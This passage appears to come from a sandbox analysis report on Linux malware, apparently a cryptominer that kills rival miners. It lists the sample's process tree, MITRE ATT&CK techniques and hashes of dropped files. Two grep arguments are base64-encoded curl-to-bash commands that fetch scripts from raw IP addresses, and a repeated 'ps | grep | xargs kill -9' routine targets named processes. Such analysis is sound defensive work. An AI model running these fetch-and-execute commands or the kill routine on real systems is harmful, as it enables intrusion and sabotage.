  2⤵
  PID:1395
- /bin/grep
  grep -v grep
  2⤵
  PID:1394
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1393
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:1400
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1401
- /bin/grep
  grep -v grep
  2⤵
  PID:1399
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1402
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1398
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1406
- /bin/grep
  grep netdns
  2⤵
  PID:1405
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1407
- /bin/grep
  grep -v grep
  2⤵
  PID:1404
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1403
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1411
- /bin/grep
  grep watchdogs
  2⤵
  PID:1410
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1412
- /bin/grep
  grep -v grep
  2⤵
  PID:1409
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1408
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1416
- /bin/grep
  grep kdevtmpfsi
  2⤵
  PID:1415
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1417
- /bin/grep
  grep -v grep
  2⤵
  PID:1414
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1413
- /bin/grep
  grep kinsing
  2⤵
  PID:1420
- /bin/grep
  grep -v grep
  2⤵
  PID:1419
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1421
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1422
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1418
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1426
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1427
- /bin/grep
  grep redis2
  2⤵
  PID:1425
- /bin/grep
  grep -v grep
  2⤵
  PID:1424
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1423
- /bin/grep
  grep " ps"
  2⤵
  PID:1431
- /bin/grep
  grep -v aux
  2⤵
  PID:1430
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1432
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1433
- /bin/grep
  grep -v grep
  2⤵
  PID:1429
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1428
- /bin/grep
  grep sync_supers
  2⤵
  PID:1436
- /bin/grep
  grep -v grep
  2⤵
  PID:1435
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1434
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1437
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1438
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1442
- /bin/grep
  grep cpuset
  2⤵
  PID:1441
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1443
- /bin/grep
  grep -v grep
  2⤵
  PID:1440
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1439
- /bin/grep
  grep -v aux
  2⤵
  PID:1446
- /bin/grep
  grep "x]"
  2⤵
  PID:1447
- /bin/grep
  grep -v grep
  2⤵
  PID:1445
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1448
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1444
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1449
- /bin/grep
  grep "sh] <"
  2⤵
  PID:1453
- /bin/grep
  grep -v aux
  2⤵
  PID:1452
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1454
- /bin/grep
  grep -v grep
  2⤵
  PID:1451
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1455
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1450
- /bin/grep
  grep " \\[]"
  2⤵
  PID:1459
- /bin/grep
  grep -v aux
  2⤵
  PID:1458
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1461
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1460
- /bin/grep
  grep -v grep
  2⤵
  PID:1457
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1456
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1465
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:1464
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1466
- /bin/grep
  grep -v grep
  2⤵
  PID:1463
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1462
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:1469
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1470
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1471
- /bin/grep
  grep -v grep
  2⤵
  PID:1468
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1467
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1475
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1476
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1474
- /bin/grep
  grep -v grep
  2⤵
  PID:1473
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1472
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1480
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:1479
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1481
- /bin/grep
  grep -v grep
  2⤵
  PID:1478
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1477
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1485
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:1484
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1486
- /bin/grep
  grep -v grep
  2⤵
  PID:1483
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1482
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1490
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:1489
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1491
- /bin/grep
  grep -v grep
  2⤵
  PID:1488
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1487
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1495
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:1494
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1496
- /bin/grep
  grep -v grep
  2⤵
  PID:1493
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1492
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:1499
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1500
- /bin/grep
  grep -v grep
  2⤵
  PID:1498
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1501
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1497
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1505
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:1504
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1506
- /bin/grep
  grep -v grep
  2⤵
  PID:1503
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1502
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1510
- /bin/grep
  grep sustse
  2⤵
  PID:1509
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1511
- /bin/grep
  grep -v grep
  2⤵
  PID:1508
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1507

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/zzhs

Filesize
2B

MD5
b026324c6904b2a9cb4b88d6d61c81d1

SHA1
e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e

SHA256
4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865

SHA512
3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

Download Submit
/usr/bin/irqbalanced

Filesize
2B

MD5
6d7fce9fee471194aa8b5b6e47267f03

SHA1
a3db5c13ff90a36963278c6a39e4ee3c22e2a436

SHA256
1121cfccd5913f0a63fec40a6ffd44ea64f9dc135c66634ba001d10bcf4302a2

SHA512
2b59d179d9815994f687383a886ea34109889756efca5ab27318cc67ce2a21261d12fa6fee6b8c716f72214ead55ee0d789d6c35cff977d40ef5728ba9188a80

Download Submit
/usr/bin/kswaped

Filesize
2B

MD5
26ab0db90d72e28ad0ba1e22ee510510

SHA1
7448d8798a4380162d4b56f9b452e2f6f9e24e7a

SHA256
53c234e5e8472b6ac51c1ae1cab3fe06fad053beb8ebfd8977b010655bfdd3c3

SHA512
63e22ec2fbeebabf005e58fbfb0eee607c4aa417045a68a0cc63767b048e3559268d35e72f367d3b2dbd5dbddf12fc4397762ba149260b3795a0391713bddcd7

Download Submit
/usr/bin/pamdicks

Filesize
2B

MD5
9ae0ea9e3c9c6e1b9b6252c8395efdc1

SHA1
ccf271b7830882da1791852baeca1737fcbe4b90

SHA256
06e9d52c1720fca412803e3b07c4b228ff113e303f4c7ab94665319d832bbfb7

SHA512
f3d08a4bfef201adbe711e8805f96ff13909719107dcac81f4fc9185040d59d8d573344a0707e697f8b4f0212e0d79f3bdd6b86688dd8c54019b9d93c937f3ca

Download Submit
/usr/bin/rctlcli

Filesize
2B

MD5
48a24b70a0b376535542b996af517398

SHA1
9c6b057a2b9d96a4067a749ee3b3b0158d390cf1

SHA256
7de1555df0c2700329e815b93b32c571c3ea54dc967b89e81ab73b9972b72d1d

SHA512
db545c410fd0c8ede533d5b0666cd2798ba380bd25b655619cd5fd3a33a255569b3ccc319bfdef3322d8392d894d15c2e6aa2d53346e6ac54eaf5d627bfe6a9a

Download Submit
/usr/bin/systemd-network

Filesize
2B

MD5
1dcca23355272056f04fe8bf20edfce0

SHA1
5d9474c0309b7ca09a182d888f73b37a8fe1362c

SHA256
f0b5c2c2211c8d67ed15e75e656c7862d086e9245420892a7de62cd9ec582a06

SHA512
29b3573989378848e91465abb8bb12aaad1c40f01ddba6ce5dce4de88d61d49621cd4272bc6f889cd469e9490040b412eb0a237cf2cd49c637da1d5de5903f3d

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads